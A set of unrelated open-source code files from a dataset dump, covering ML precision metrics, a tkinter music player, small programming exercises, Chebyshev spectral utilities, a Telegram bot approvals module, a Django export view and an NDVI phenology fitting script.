precision_at_score_percentile(y_true, y_score, pctile=90, max_pctile=100):\n y_true = np.ravel(y_true)\n y_score = np.ravel(y_score)\n ys = y_true[(y_score >= np.percentile(y_score, pctile)) & (y_score <= np.percentile(y_score, max_pctile))]\n count = len(ys)\n if count == 0:\n return 0\n return np.sum(ys) / count\n\n\ndef precision_by_score_buckets(y_true, y_score, n_buckets=100):\n y_true = np.ravel(y_true)\n y_score = np.ravel(y_score)\n y_true_sorted = y_true[np.argsort(y_score)]\n chunks = np.array_split(y_true_sorted, n_buckets)\n sums = np.array([sum(x) for x in chunks])\n counts = np.array([len(x) for x in chunks])\n return sums / counts\n\n\ndef plot_precision_by_score_buckets(y_true, y_score, n_buckets=100, title='Precision by score bucket'):\n precs = precision_by_score_buckets(y_true, y_score, n_buckets)\n plt.plot(precs, marker='o', linestyle='')\n plt.title(title)\n\n\ndef plot_bucket_counts(y_true, y_score, bucketsize=100):\n nbuckets = int(len(y_true) / bucketsize)\n counts = bucketsize * precision_by_score_buckets(y_true, y_score, nbuckets)\n bucket_avg = bucketsize * (sum(y_true) / len(y_true))\n plt.plot(counts, marker='o', linestyle='')\n plt.plot([0, nbuckets], [bucket_avg, bucket_avg], '--')\n plt.xlabel('Buckets of %d ordered by score' % bucketsize)\n plt.ylabel('True positive count per bucket')\n plt.title('Predictions ranked by score, buckets of %d' % bucketsize)\n\n","repo_name":"wleftwich/rr-recruiting-ml","sub_path":"metric_utils.py","file_name":"metric_utils.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34473591257","text":"import os\r\nimport tkinter as tk\r\nfrom tkinter import filedialog\r\nimport pygame\r\n\r\n\r\nclass MusicPlayer:\r\n def __init__(self, root):\r\n self.root = root\r\n self.root.title(\"Music Player\")\r\n\r\n self.playlist = []\r\n self.current_index = 0\r\n self.paused = False\r\n\r\n pygame.init()\r\n\r\n self.create_ui()\r\n self.root.mainloop()\r\n\r\n def create_ui(self):\r\n # Create buttons\r\n self.btn_load = tk.Button(\r\n self.root, text=\"Load Songs\", command=self.load_songs\r\n )\r\n self.btn_play = tk.Button(\r\n self.root, text=\"Play\", state=tk.DISABLED, command=self.play_music\r\n )\r\n self.btn_pause = tk.Button(\r\n self.root, text=\"Pause\", state=tk.DISABLED, command=self.pause_music\r\n )\r\n self.btn_stop = tk.Button(\r\n self.root, text=\"Stop\", state=tk.DISABLED, command=self.stop_music\r\n )\r\n\r\n # Create label for current song\r\n self.lbl_current_song = tk.Label(self.root, text=\"No song loaded\")\r\n\r\n # Position buttons and label\r\n self.btn_load.pack(pady=20)\r\n self.btn_play.pack(pady=10)\r\n self.btn_pause.pack(pady=10)\r\n self.btn_stop.pack(pady=10)\r\n self.lbl_current_song.pack(pady=20)\r\n\r\n def load_songs(self):\r\n # Clear the current playlist\r\n self.playlist.clear()\r\n\r\n # Open a file dialog to select multiple audio files\r\n files = filedialog.askopenfilenames(\r\n initialdir=\"/\", title=\"Select Songs\", filetypes=((\"Audio Files\", \"*.mp3\"), (\"All Files\", \"*.*\"))\r\n )\r\n\r\n # Add selected files to the playlist\r\n for file in files:\r\n self.playlist.append(file)\r\n\r\n if self.playlist:\r\n self.btn_play.config(state=tk.NORMAL)\r\n self.lbl_current_song.config(text=\"Loaded {} songs\".format(len(self.playlist)))\r\n\r\n def play_music(self):\r\n if pygame.mixer.music.get_busy():\r\n pygame.mixer.music.unpause()\r\n else:\r\n self.load_song_from_playlist()\r\n\r\n def pause_music(self):\r\n pygame.mixer.music.pause()\r\n self.paused = True\r\n\r\n def stop_music(self):\r\n pygame.mixer.music.stop()\r\n self.paused = False\r\n\r\n def load_song_from_playlist(self):\r\n if self.current_index < len(self.playlist):\r\n current_song = self.playlist[self.current_index]\r\n pygame.mixer.music.load(current_song)\r\n pygame.mixer.music.play()\r\n self.lbl_current_song.config(text=\"Now playing: {}\".format(os.path.basename(current_song)))\r\n self.btn_pause.config(state=tk.NORMAL)\r\n self.btn_stop.config(state=tk.NORMAL)\r\n self.current_index += 1\r\n else:\r\n self.lbl_current_song.config(text=\"No more songs in the playlist\")\r\n self.btn_play.config(state=tk.DISABLED)\r\n self.btn_pause.config(state=tk.DISABLED)\r\n self.btn_stop.config(state=tk.DISABLED)\r\n\r\n\r\n# Create the main window\r\nroot = tk.Tk()\r\nroot.geometry(\"300x200\")\r\n\r\n# Create an instance of the MusicPlayer\r\nmusic_player = MusicPlayer(root)\r\n","repo_name":"AnakhaRMenon/CodeClause_project_name","sub_path":"CODE CLAUSE/Music Player/MusicPlayer.py","file_name":"MusicPlayer.py","file_ext":"py","file_size_in_byte":3154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40115489657","text":"meu_arquivo = open('times.txt', 'r', encoding=\"utf8\")\n\nlista = []\nfor linha in meu_arquivo:\n lista.append(linha.rstrip())\n\njogos=[]\nfor rodada in range(len(lista)):\n for partida in range(rodada+1, len(lista)):\n jogos.append(lista[rodada] + ' X '+ lista[partida])\n \n\nprint(jogos)\n\n\nmeu_arquivo.close\n \n \n","repo_name":"matteovar/Python","sub_path":"Leitura- Questao2).py","file_name":"Leitura- Questao2).py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12668795575","text":"#https://www.acmicpc.net/problem/7568\n\"\"\"\nn개의 인원의 몸무게와 키를 입력받고\n만약 자신의 몸무게와 키가 ���른 사람의 몸무게와 키보다 크다면\n내가 더 덩치가 큰 것으로 계산한다.\n\n알고리즘 설명\n1. 받은 값들을 리스트의 2차원 배열로 저장한다.\n2. 기준 값을 설정한다. 기준 값은 한명씩 돌아가면서 해야하기 때문에\n for문을 리스트의 길이로 설정한다.\n 기준 값은 받은 리스트에서 맨 앞에 값을 pop을 해서 빼낸다.\n3. 기준값과 기준값이 빠진 기존 리스트의 값들을 처음부터 하나씩 비교한다.\n 만약 기준값과 리스트에서 빼온 값끼리 서로 비교했을 때\n 키와 몸무게가 빼온 값이 더 작으면 count+=1을 한다\n4. 한 사이클이 종료되면 big_list라는 count의 값을 담는 리스트에\n count 값을 추가한다. 이것은 나중에 등수를 지정하는 리스트로 이용한다.\n5. 모든 사이클이 종료되면 이제 등수를 설정해야한다.\n big_list의 값을 하나씩 비교한다. big_list[0]과 big_list[0], big_list[0]과 big_list[1] ....\n6. 만약 big_list[i] > big_list[j] 라면 자신의 덩치가 더 작은것이니 rank += 1을 하면 된다.\n7. 최종적으로 rank가 담긴 list를 반환하면 된다.\n\"\"\"\n\npeople_num = int(input())\npeople_info_list = []\nbig_list = []\nfor i in range(people_num):\n a = list(map(int,input().split(\" \")))\n people_info_list.append(list(a))\n\n#1개의 기준 리스트와, 나머지 리스트들의 원소를 다 꺼냄\nfor i in range(people_num):\n temp = people_info_list.pop(0)\n count = 1\n for k in range(len(people_info_list)):\n if temp[0] < people_info_list[k][0] and temp[1] < people_info_list[k][1]:\n count+=1\n people_info_list.append(temp)\n big_list.append(count)\n\n\nprint(*big_list)\n","repo_name":"WhiteChaplin/baekjoon","sub_path":"브루탈포스/덩치.py","file_name":"덩치.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"86335499211","text":"import numpy as np\nfrom scipy.sparse import diags\n\ndef clencurt(Np1, a, b):\n \"\"\"\n Clenshaw-curtis nodes cpts and weights cwts,\n i.e. the Chebyshev points of the second kind, and\n associated weights. These are such that\n f(cpts) \\cdot cwts = \\int_a^b f(x) dx (they are rescaled to [a,b])\n The implementation follows that given in ATAP by Trefethen\n \n Parameters:\n Np1 - number of Chebyshev points and weights\n a, b - left and right endpoints for interval [a,b]\n\n Returns:\n cpts - Chebyshev points of the second kind on [a,b]\n cwts - clenshaw-curtis quadrature weights \n \"\"\"\n N = Np1 - 1; H = (b - a) / 2; bpad2 = (b + a) / 2;\n v = np.zeros((N-1,), dtype = np.double)\n cpts = np.zeros((Np1,), dtype = np.double)\n cwts = np.zeros((Np1,), dtype = np.double)\n if N % 2:\n w1 = H / (N * N); end = int((N - 1) / 2 + 1)\n else:\n w1 = H / (N * N - 1); end = int(N / 2)\n # compute cheb points\n cpts = H * np.cos(np.pi * np.arange(0,Np1) / N) + bpad2 \n # now do weights\n cwts[0] = w1; cwts[N] = w1;\n v[0:N] = 1.0; iis = np.arange(1, N)\n for k in range(1, end):\n v -= 2 * np.cos(2.0 * k * np.pi * iis / N) / (4.0 * k * k - 1.0)\n if N % 2 == 0:\n v -= np.cos(N * np.pi * iis / N) / (N * N -1)\n cwts[1:N] = 2 * H * v / N \n return cpts, cwts \n\ndef chebCoeffDiff(fhat, Nx, Ny, Nz, dof, H):\n \"\"\"\n Compute the Fourier-Chebyshev coefficients of the \n z-derivative of fhat.\n \n Parameters:\n fhat (complex) - Fourier-Chebyshev coefficients of grid\n function f, given sampling on a Chebyshev \n grid in z, and uniform in x,y. This is the\n combined real and complex part, i.e.\n fhat = fhat_r + 1j * fhat_i\n Nx,Ny,Nz - number of points in x,y,z\n dof - degrees of freedom of fhat (num components of vec field)\n H - (b-a)/2 for z \\in [a,b]\n \n Returns:\n Df (complex) - Fourier-Chebyshev coefficients of dfhat/dz. \n This the combined real and complex part\n \n \"\"\"\n Df = np.zeros((Nz, Ny, Nx, dof), dtype = np.complex) \n fhat_rs = np.reshape(fhat, (Nz, Ny, Nx, dof))\n Df[-2,:,:,:] = 2 / H * (Nz - 1) * fhat_rs[-1,:,:,:] \n for j in range(2,Nz):\n Df[Nz-j-1,:,:,:] = Df[Nz-j+1,:,:,:] + 2 / H * (Nz - j) * fhat_rs[Nz-j,:,:,:]\n Df[0,:,:,:] /= 2\n return Df\n\ndef chebCoeffDiff_perm(fhat, Nx, Ny, Nz, dof, H):\n \"\"\"\n Compute the Fourier-Chebyshev coefficients of the \n z-derivative of fhat for permuted layout.\n \n Parameters:\n fhat (complex) - Fourier-Chebyshev coefficients of grid\n function f, given sampling on a Chebyshev \n grid in z, and uniform in x,y. This is the\n combined real and complex part, i.e.\n fhat = fhat_r + 1j * fhat_i\n Nx,Ny,Nz - number of points in x,y,z\n dof - degrees of freedom of fhat (num components of vec field)\n H - (b-a)/2 for z \\in [a,b]\n \n Returns:\n Df (complex) - Fourier-Chebyshev coefficients of dfhat/dz. \n This the combined real and complex part\n \n \"\"\"\n Df = np.zeros((Ny, Nx, Nz, dof), dtype = np.complex) \n fhat_rs = np.reshape(fhat, (Ny, Nx, Nz, dof))\n Df[:,:,-2,:] = 2 / H * (Nz - 1) * fhat_rs[:,:,-1,:] \n for j in range(2,Nz):\n Df[:,:,Nz-j-1,:] = Df[:,:,Nz-j+1,:] + 2 / H * (Nz - j) * fhat_rs[:,:,Nz-j,:]\n Df[:,:,0,:] /= 2\n return Df\n \ndef precomputeInts(Nz, H):\n \"\"\"\n Precompute the integrals for the Nz Chebyshev modes that come up in\n the null-space A_p, A_x, A_y values for the pressure and velocity\n DP BVP solve\n \n Parameters:\n Nz - number of points on the z grid\n H - (b-a)/2 for z \\in [a,b]\n \n Returns:\n pints - precomputed integrals of Chebyshev polynomials \n for pressure correction\n uvints - precomputed integrals of Chebyshev polynomials\n for velocity correctionj\n \"\"\"\n theta = np.pi * np.arange(0,1000).reshape(-1, 1) / 999\n _, zwts = clencurt(1000, 0, 2 * H)\n zwts = np.reshape(zwts, (1, -1))\n pints = np.dot(zwts, (np.cos(np.arange(0, Nz) * theta)))\n uvints = H * np.dot(zwts, (np.cos(np.arange(0, Nz) * theta) * np.cos(theta)))\n return pints, uvints\n\ndef firstIntegralMatrix(N, H):\n \"\"\"\n Compute the first Chebyshev integration matrix. This maps\n Chebyshev coefficients of a function to the coefficients\n of the integral of the function\n \n Parameters:\n N - number of Chebyshev points\n H - (b-a)/2 for a Chebyshev grid [a,b]\n\n Returns:\n FIMat - the first Chebyshev integral matrix, scaled by H\n \"\"\"\n jj = np.arange(2,N)\n colm1 = np.concatenate(([1], 1 / (2 * jj)))\n colp1 = np.concatenate(([0, -1 / 2], -1 / (2 * jj) * (jj < N - 1)))\n FIMat = diags([colm1, colp1], [-1, 1], shape = (N, N+2)).toarray(order='F')\n FIMat[0,N+1] = 1\n return H * FIMat\n\ndef secondIntegralMatrix(N, H):\n \"\"\"\n Compute the second Chebyshev integration matrix. This maps\n Chebyshev coefficients of a function to the coefficients\n of the second integral of the function\n \n Parameters:\n N - number of Chebyshev points\n H - (b-a)/2 for a Chebyshev grid [a,b]\n\n Returns:\n SIMat - the second Chebyshev integral matrix, scaled by H^2\n \"\"\"\n\n jj = np.arange(3, N)\n colm2 = np.concatenate(([0.25], 1 / (2 * jj * (2 * jj - 2))))\n colp2 = np.concatenate(([0, 0.125, 1./24.], 1 / (2 * jj * (2 * jj + 2)) * (jj < N - 2)))\n col0 = np.concatenate(([0, -0.125, -1. / 8. - 1. / 24.], -1 / (2 * jj * (2 * jj - 2)) \\\n - 1 / (2 * jj * (2 * jj + 2)) * (jj < N - 1))) \n SIMat = diags([colm2, col0, colp2], [-2, 0, 2], shape = (N,N+2)).toarray(order='F')\n SIMat[0,N] = 1; SIMat[1,N+1] = 1;\n return H**2 * SIMat\n","repo_name":"stochasticHydroTools/DoublyPeriodicStokes","sub_path":"source/cpu/python/Chebyshev.py","file_name":"Chebyshev.py","file_ext":"py","file_size_in_byte":5626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74392138706","text":"import html\n\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup, ParseMode, Update\nfrom telegram.error import BadRequest\nfrom telegram.ext import CallbackContext, CallbackQueryHandler\nfrom telegram.utils.helpers import mention_html\n\nimport NekoRobot.modules.sql.approve_sql as sql\nfrom NekoRobot import DRAGONS, NEKO_PTB\nfrom NekoRobot.modules.disable import DisableAbleCommandHandler\nfrom NekoRobot.modules.helper_funcs.chat_status import user_admin\nfrom NekoRobot.modules.helper_funcs.extraction import extract_user\nfrom NekoRobot.modules.log_channel import loggable\n\n\n@loggable\n@user_admin\ndef approve(update, context):\n message = update.effective_message\n chat_title = message.chat.title\n chat = update.effective_chat\n args = context.args\n user = update.effective_user\n user_id = extract_user(message, args)\n if not user_id:\n message.reply_text(\n \"I don't know who you're talking about, you're going to need to specify a user!\"\n )\n return \"\"\n try:\n member = chat.get_member(user_id)\n except BadRequest:\n return \"\"\n if member.status in [\"administrator\", \"creator\"]:\n message.reply_text(\n \"User is already admin - locks, blocklists, and antiflood already don't apply to them.\"\n )\n return \"\"\n if sql.is_approved(message.chat_id, user_id):\n message.reply_text(\n f\"[{member.user['first_name']}](tg://user?id={member.user['id']}) is already approved in {chat_title}\",\n parse_mode=ParseMode.MARKDOWN,\n )\n return \"\"\n sql.approve(message.chat_id, user_id)\n message.reply_text(\n f\"[{member.user['first_name']}](tg://user?id={member.user['id']}) has been approved in {chat_title}! They will now be ignored by automated admin actions like locks, blocklists, and antiflood.\",\n parse_mode=ParseMode.MARKDOWN,\n )\n return f\"{html.escape(chat.title)}:\\n#APPROVED\\nAdmin: {mention_html(user.id, user.first_name)}\\nUser: {mention_html(member.user.id, member.user.first_name)}\"\n\n\n@loggable\n@user_admin\ndef disapprove(update, context):\n message = update.effective_message\n chat_title = message.chat.title\n chat = update.effective_chat\n args = context.args\n user = update.effective_user\n user_id = extract_user(message, args)\n if not user_id:\n message.reply_text(\n \"I don't know who you're talking about, you're going to need to specify a user!\"\n )\n return \"\"\n try:\n member = chat.get_member(user_id)\n except BadRequest:\n return \"\"\n if member.status in [\"administrator\", \"creator\"]:\n message.reply_text(\"This user is an admin, they can't be unapproved.\")\n return \"\"\n if not sql.is_approved(message.chat_id, user_id):\n message.reply_text(f\"{member.user['first_name']} isn't approved yet!\")\n return \"\"\n sql.disapprove(message.chat_id, user_id)\n message.reply_text(\n f\"{member.user['first_name']} is no longer approved in {chat_title}.\"\n )\n return f\"{html.escape(chat.title)}:\\n#UNAPPROVED\\nAdmin: {mention_html(user.id, user.first_name)}\\nUser: {mention_html(member.user.id, member.user.first_name)}\"\n\n\n@user_admin\ndef approved(update, context):\n message = update.effective_message\n chat_title = message.chat.title\n chat = update.effective_chat\n msg = \"The following users are approved.\\n\"\n approved_users = sql.list_approved(message.chat_id)\n for i in approved_users:\n member = chat.get_member(int(i.user_id))\n msg += f\"- `{i.user_id}`: {member.user['first_name']}\\n\"\n if msg.endswith(\"approved.\\n\"):\n message.reply_text(f\"No users are approved in {chat_title}.\")\n return \"\"\n else:\n message.reply_text(msg, parse_mode=ParseMode.MARKDOWN)\n\n\n@user_admin\ndef approval(update, context):\n message = update.effective_message\n chat = update.effective_chat\n args = context.args\n user_id = extract_user(message, args)\n member = chat.get_member(int(user_id))\n if not user_id:\n message.reply_text(\n \"I don't know who you're talking about, you're going to need to specify a user!\"\n )\n return \"\"\n if sql.is_approved(message.chat_id, user_id):\n message.reply_text(\n f\"{member.user['first_name']} is an approved user. Locks, antiflood, and blocklists won't apply to them.\"\n )\n else:\n message.reply_text(\n f\"{member.user['first_name']} is not an approved user. They are affected by normal commands.\"\n )\n\n\ndef unapproveall(update: Update, context: CallbackContext):\n chat = update.effective_chat\n user = update.effective_user\n member = chat.get_member(user.id)\n if member.status != \"creator\" and user.id not in DRAGONS:\n update.effective_message.reply_text(\n \"Only the chat owner can unapprove all users at once.\"\n )\n else:\n buttons = InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"Unapprove all users\", callback_data=\"unapproveall_user\"\n )\n ],\n [\n InlineKeyboardButton(\n text=\"Cancel\", callback_data=\"unapproveall_cancel\"\n )\n ],\n ]\n )\n update.effective_message.reply_text(\n f\"Are you sure you would like to unapprove ALL users in {chat.title}? This action cannot be undone.\",\n reply_markup=buttons,\n parse_mode=ParseMode.MARKDOWN,\n )\n\n\ndef unapproveall_btn(update: Update, context: CallbackContext):\n query = update.callback_query\n chat = update.effective_chat\n message = update.effective_message\n member = chat.get_member(query.from_user.id)\n if query.data == \"unapproveall_user\":\n if member.status == \"creator\" or query.from_user.id in DRAGONS:\n approved_users = sql.list_approved(chat.id)\n users = [int(i.user_id) for i in approved_users]\n for user_id in users:\n sql.disapprove(chat.id, user_id)\n\n if member.status == \"administrator\":\n query.answer(\"Only owner of the chat can do this.\")\n\n if member.status == \"member\":\n query.answer(\"You need to be admin to do this.\")\n elif query.data == \"unapproveall_cancel\":\n if member.status == \"creator\" or query.from_user.id in DRAGONS:\n message.edit_text(\"Removing of all approved users has been cancelled.\")\n return \"\"\n if member.status == \"administrator\":\n query.answer(\"Only owner of the chat can do this.\")\n if member.status == \"member\":\n query.answer(\"You need to be admin to do this.\")\n\n\n__help__ = \"\"\"\nSometimes, you might trust a user not to send unwanted content.\nMaybe not enough to make them admin, but you might be ok with locks, blacklists, and antiflood not applying to them.\n\nThat's what approvals are for - approve of trustworthy users to allow them to send \n\n*Admin commands:*\n- `/approval`*:* Check a user's approval status in this chat.\n- `/approve`*:* Approve of a user. Locks, blacklists, and antiflood won't apply to them anymore.\n- `/unapprove`*:* Unapprove of a user. They will now be subject to locks, blacklists, and antiflood again.\n- `/approved`*:* List all approved users.\n- `/unapproveall`*:* Unapprove *ALL* users in a chat. This cannot be undone.\n\"\"\"\n\nAPPROVE = DisableAbleCommandHandler(\"approve\", approve, run_async=True)\nDISAPPROVE = DisableAbleCommandHandler(\"unapprove\", disapprove, run_async=True)\nAPPROVED = DisableAbleCommandHandler(\"approved\", approved, run_async=True)\nAPPROVAL = DisableAbleCommandHandler(\"approval\", approval, run_async=True)\nUNAPPROVEALL = DisableAbleCommandHandler(\"unapproveall\", unapproveall, run_async=True)\nUNAPPROVEALL_BTN = CallbackQueryHandler(\n unapproveall_btn, pattern=r\"unapproveall_.*\", run_async=True\n)\n\nNEKO_PTB.add_handler(APPROVE)\nNEKO_PTB.add_handler(DISAPPROVE)\nNEKO_PTB.add_handler(APPROVED)\nNEKO_PTB.add_handler(APPROVAL)\nNEKO_PTB.add_handler(UNAPPROVEALL)\nNEKO_PTB.add_handler(UNAPPROVEALL_BTN)\n\n__mod_name__ = \"Approvals\"\n__command_list__ = [\"approve\", \"unapprove\", \"approved\", \"approval\"]\n__handlers__ = [APPROVE, DISAPPROVE, APPROVED, APPROVAL]\n","repo_name":"Awesome-Prince/NekoRobot-3","sub_path":"NekoRobot/modules/approve.py","file_name":"approve.py","file_ext":"py","file_size_in_byte":8360,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"48"} +{"seq_id":"42792671886","text":"#vim: set fileencoding=utf-8\nimport os\nimport time\nimport hashlib\nfrom os.path import normpath\nfrom os.path import join\nfrom django.conf import settings\nfrom django.contrib.auth import decorators\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponseRedirect\nfrom django.utils.decorators import method_decorator\nfrom django.views.generic.base import TemplateView\nfrom documents.models import Document\nfrom documents.lib.allegro import Allegro\nfrom documents.lib.bibtex import Bibtex\n\n\nclass ExportView(TemplateView):\n template_name = 'documents/export.html'\n\n def get_context_data(self, **kwargs):\n context = super(ExportView, self).get_context_data(**kwargs)\n biblist = list()\n allegrolist = list()\n _basepath = normpath(settings.DOCUMENTS_SECDIR)\n _bibtexdir = normpath(settings.DOCUMENTS_BIBTEX)\n _allegrodir = normpath(settings.DOCUMENTS_ALLEGRO_FILES)\n filepath_bibtex = normpath(join(_basepath, _bibtexdir))\n filepath_allegro = normpath(join(_basepath, _allegrodir))\n for file in sorted(os.listdir(filepath_bibtex)):\n if str(file).lower().endswith('.bib'):\n _sec_path = join(_bibtexdir, file)\n sec_link = _gen_sec_link(_sec_path)\n biblist.append({'link': sec_link, 'desc': str(file)})\n for file in sorted(os.listdir(filepath_allegro)):\n if str(file).lower().endswith('.adt'):\n _sec_path = join(_allegrodir, file)\n sec_link = _gen_sec_link(_sec_path)\n allegrolist.append({'link': sec_link, 'desc': str(file)})\n biblist.reverse()\n context['biblist'] = biblist\n context['biblist_small'] = biblist[0:3]\n context['export_bib_state'] = Bibtex.get_state()\n\n allegrolist.reverse()\n context['allegrolist'] = allegrolist\n context['allegrolist_small'] = allegrolist[0:3]\n context['export_allegro_state'] = Allegro.get_state()\n return context\n\n @method_decorator(\n decorators.permission_required('documents.can_see_export', raise_exception=True))\n def dispatch(self, *args, **kwargs):\n return super(ExportView, self).dispatch(*args, **kwargs)\n\n\ndef _gen_sec_link(path):\n \"\"\" Generate a formerly secure link, now its only a link.\n\n This method formerly generated a secure link to the BibTeX and Allegro\n export files. These file have been moved to /static/ in order to guarantee\n a fast drop of the dependency of lighttpd. Now essentially every webserver\n can be used to deploy WireLib.\n If in a random future secure links should be reimplemented the 'X-Sendfile'\n flag is probably a good starting point.\n \"\"\"\n static = settings.STATIC_URL\n sec_path = settings.DOCUMENTS_SECDIR\n sec_dir = sec_path.rpartition('static/')[2] # Everything left of static.\n file_path = join(static, sec_dir, path)\n return file_path\n\n\n@decorators.permission_required('documents.can_export', raise_exception=True)\ndef export_allegro(request):\n if not Allegro.get_state():\n allegro_thread = Allegro()\n allegro_thread.start()\n return HttpResponseRedirect(reverse('documents.export'))\n\n\n@decorators.permission_required('documents.can_export', raise_exception=True)\ndef export_bibtex(request):\n if not Bibtex.get_state():\n docs_to_export = Document.objects.filter(bib_date__isnull=True)\n _basepath = normpath(settings.DOCUMENTS_SECDIR)\n _bibtexdir = normpath(settings.DOCUMENTS_BIBTEX)\n _filepath_bibtex = normpath(join(_basepath, _bibtexdir))\n bibtex_thread = Bibtex().export_data(docs_to_export, _filepath_bibtex)\n bibtex_thread.start()\n return HttpResponseRedirect(reverse('documents.export'))\n","repo_name":"WiReSEP/WireLib2012","sub_path":"src/documents/views/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":3769,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"29796052409","text":"# ######################################## LOAD REQUIRED MODULES ############################################## #\nimport os\nimport sys\nimport time\nimport datetime\nimport ogr\nimport osr\nfrom osgeo import gdal\nfrom osgeo.gdalconst import *\nimport numpy as np\nfrom osgeo import gdal_array as gdalnumeric\nimport csv\nimport itertools\nimport math\ngdal.TermProgress = gdal.TermProgress_nocb\ngdal.TermProgress = gdal.TermProgress_nocb\nimport scipy.ndimage\nimport struct\nfrom scipy.optimize import leastsq\nfrom pylab import *\n\n# ####################################### SET TIME-COUNT ################################################################## #\nstarttime = time.strftime(\"%a, %d %b %Y %H:%M:%S\", time.localtime())\nprint(\"--------------------------------------------------------\")\nprint(\"Starting process, time:\", starttime)\nprint(\"\")\n# ####################################### BUILD GLOBAL FUNCTIONS ########################################################## #\ndef GetInfoFromCSV(csv_file, subsetRow, subsetColumn, variable): # Row is 'year', Column is 'point' (starts column 4 (3 in py-notation))\n\tdata = np.genfromtxt(csv_file, names = True, delimiter = ',', dtype = None)\n\tout_array = [[],[]]\n\tif variable == \"ndvi\":\n\t\tfor row in data:\n\t\t\tif row['Year'] == subsetRow:\n\t\t\t\tout_array[1].append((row[subsetColumn] * 0.0001))\n\t\t\t\tout_array[0].append(row['DOY'])\n\tif variable == \"temp\":\n\t\tfor row in data:\n\t\t\tif row['Year'] == subsetRow:\n\t\t\t\tout_array[1].append((row[subsetColumn] - 273.15)) \n\t\t\t\tout_array[0].append(row['DOY'])\n\treturn np.array(out_array)\n\ndef CalculateAGDD(temperature_table, t_base, t_max):\n out_array = []\n out_array.append(temperature_table[0])\n b = np.clip (temperature_table[1], t_base, t_max)\n c = np.where (b - t_base < 0, 0, b - t_base)\n agdd = c.cumsum ( axis=0 )\n out_array.append(list(agdd))\n return out_array\n\ndef InterpolateNDVI(ndvi_data, temp_data):\n out_array = []\n DOYs = np.arange(1, (len(temp_data[0])+1))\n ndvi_days = ndvi_data[0]\n ndvi_vals = ndvi_data[1]\n ndvid = np.interp(DOYs, ndvi_days, ndvi_vals)\n out_array.append(DOYs)\n out_array.append(ndvid)\n return out_array\n\ndef FitNDVI(ndvi_day):\n\tDOY = ndvi_day[0]\n\tndvis = ndvi_daily[1]\n\tndvi_max = np.max(ndvis)\n\tndvi_min = ndvi_daily[1][0]\n\tfitfunc = lambda p, DOY: ndvi_min + (ndvi_max-ndvi_min) * (1./(1+np.exp(p[0]*(DOY-p[1])))+1./(1+np.exp(p[2]*(DOY-p[3]))) - 1)\n\tinit = np.array([0.3, 165, 0.3, 240])\n\terrfunc = lambda p, doy, NDVI: fitfunc(p, doy) - NDVI\n\tp1,success = leastsq(errfunc, init[:], args=(DOY,ndvis),maxfev=100000000)\n\treturn p1\n\ndef FitPhenologyModel(agdd_daily, ndvi_daily):\n\tnp.seterr(over=None)\n\tDOY = ndvi_daily[0]\n\tndvis = ndvi_daily[1]\n\tagdds = agdd_daily[1]\n\tndvi_min = np.min(ndvis)\n\tndvi_range = np.max(ndvis) - np.min(ndvis)\n\tinit_parameters = np.array([ndvi_min, ndvi_range, 0.3, 165, 0.3, 240])\n\tPhenoFunction = init_parameters[0]+init_parameters[1]*(1./(1+np.exp(init_parameters[2]*(agdd_daily-init_parameters[3])))+1./(1+np.exp(-init_parameters[4]*(agdd_daily-init_parameters[5])))-1)\n\toutput = []\n\tfitness = lambda p, ndvi, agdd: ndvi - PhenoFunction\n\toot = fitness(init_parameters, ndvi_daily, agdd_daily)\n\t[output.append(x) for x in oot]\n\toutput = np.array(output).squeeze()\n\treturn output\t\n\t\ndef WriteOutput(outlist, outfile):\n\tprint(\"Write Output-File\")\n\twith open(outfile, \"w\") as the_file:\n\t\tcsv.register_dialect(\"custom\", delimiter=\",\", skipinitialspace=True, lineterminator='\\n')\n\t\twriter = csv.writer(the_file, dialect=\"custom\")\n\t\tfor element in outlist:\n\t\t\twriter.writerow(element)\n\n# ####################################### ESTABLISH INPUT-PARAMETERS FOR WHOLE SCRIPT ##################################### #\n# (1) Input-Tables from previous processes\nNDVI_input = \"E:/kirkdata/mbaumann/Species-separation_Chapter03/05_Warping/01_Point-Intersection_MODIS-NDVI_Output_doyAdded.csv\"\nTMP_input = \"E:/kirkdata/mbaumann/Species-separation_Chapter03/05_Warping/02_DailyMeanTemp_Output_doyAdded.csv\"\n# (2) Year, which we will process\nyear_list = [2001,2002,2003,2004,2005,2006,2007,2008,2009,2010,2011,2012]\n# (3) Names of Point-Location that we collected values for\npoint_list = [\"Point_01\",\"Point_02\",\"Point_03\",\"Point_04\",\"Point_05\",\"Point_06\",\"Point_07\",\"Point_08\",\"Point_09\",\"Point_10\",\"Point_11\",\"Point_12\", \\\n\"Point_13\",\"Point_14\",\"Point_15\",\"Point_16\",\"Point_17\",\"Point_18\",\"Point_19\",\"Point_20\",\"Point_21\",\"Point_22\",\"Point_23\"]\n# (4) Minimum temperature for Growing Degrees\nt_base = 10\n# (5) Maximum temperature for Growing Degrees\nt_max = 40\n\n# ######################################## ESTABLISH OUTPUT-LISTS THAT WE FILL WITH THE VALUES ############################ #\noutput_NDVI_Interpolation = [] # NDVI-INTERPOLATION\noutput_AGDD_Calculation = []\noutput_parameters = [] # FITTING PARAMETERS\noutput_parameters_Titles = [\"Point_ID\", \"Year\", \"Param_p[0]\",\"Param_p[1]\",\"Param_p[2]\",\"Param_p[3]\"]\noutput_parameters.append(output_parameters_Titles)\noutput_NDVI_Fitting = []\noutput_phenology = []\n\n# ######################################## FIT YEARLY NDVI-CURVES FOR 1 POINT IN 1 YEAR, EXTRACT PARAMETERS ############### #\nfor point in point_list:\n\tprint(\"Processing Point: \", point)\n\tvariable = point\n\t# Establish list for daily NDVI-interpolation\n\tndvi_list = [variable]\n\t# 